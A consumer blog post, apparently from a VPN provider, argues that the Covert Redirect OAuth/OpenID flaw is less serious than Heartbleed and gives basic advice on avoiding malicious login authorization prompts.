News organizations reporting on it, a fancy looking website (ok, not as pretty as Heartbleed), a sexy logo, and blog posts a plenty saying that the online sky is falling is having many thinking that the OpenID and OAuth flaws, known as Covert Redirect, are the new HeartBleed.
Where Heartbleed was a genuine security flaw that jeopardized the personal information of approximately everyone who goes online, the Covert Redirect flaw is one that has been known about and dealt with already.
Covert Redirect: Definitely NOT the New Heartbleed
Making light of Covert Redirect would be a mistake. It is not on level with Heartbleed, but it is still a security flaw that leaves your information vulnerable.
The difference between Covert Redirect and Heartbleed is that most major online platforms have been aware for awhile now, and fixed it way back then. Many had already written blog posts about how they’d dealt with it before the story ‘broke.’ The problem, it seems, is that while the main logins for the major developers is fine, their third part developers are not.
How does Covert Redirect leave you vulnerable
Essentially, log in details for your social media accounts can be stolen by websites which are not managed by the parent company: Google, Facebook, Paypal, and LinkedIn.
As an example, you can be logged into your Facebook account, but get a link from an email or other website that asks for you to login through Facebook to verify your ID. Your information is vulnerable at this point.
This is due to the fact that many of these third party developers are using an older version of OAuth 2.0.
Which websites are vulnerable to Covert Redirect
A number of the common websites which you use online are vulnerable to the Covert Redirect flaw. Examples include:
The vulnerability level for each website varies, but all are aware of the problem and have long ago implemented measures to control the issue. Each one has a problem with a third party developer, it is not ‘in-house.’
How to protect yourself against Covert Redirect
For the most part, you are already protected against Covert Redirect, if you follow some common sense policies:
- Always verifying links before clicking on them
- Never blindly authorizing any app or website access to your information
Simply put, when someone asks you for your login details, it had better be because you initiated it. Say you want to leave a comment on NFL.com, which requires a Facebook ID. That will show an authorization window, that is fine.
If you were to go onto a site you don’t know and have a pop up window ask for authorization to access your Facebook ID, that had better be a clue to you to hit the “NO” button.
As always, good encryption, such as that offered by a quality VPN service, offers a layer of protection around your data, login details and everything you do online. Using a VPN is still no reason to blindly give authorization to apps and websites, but it can protect your data further in all data breach scenarios.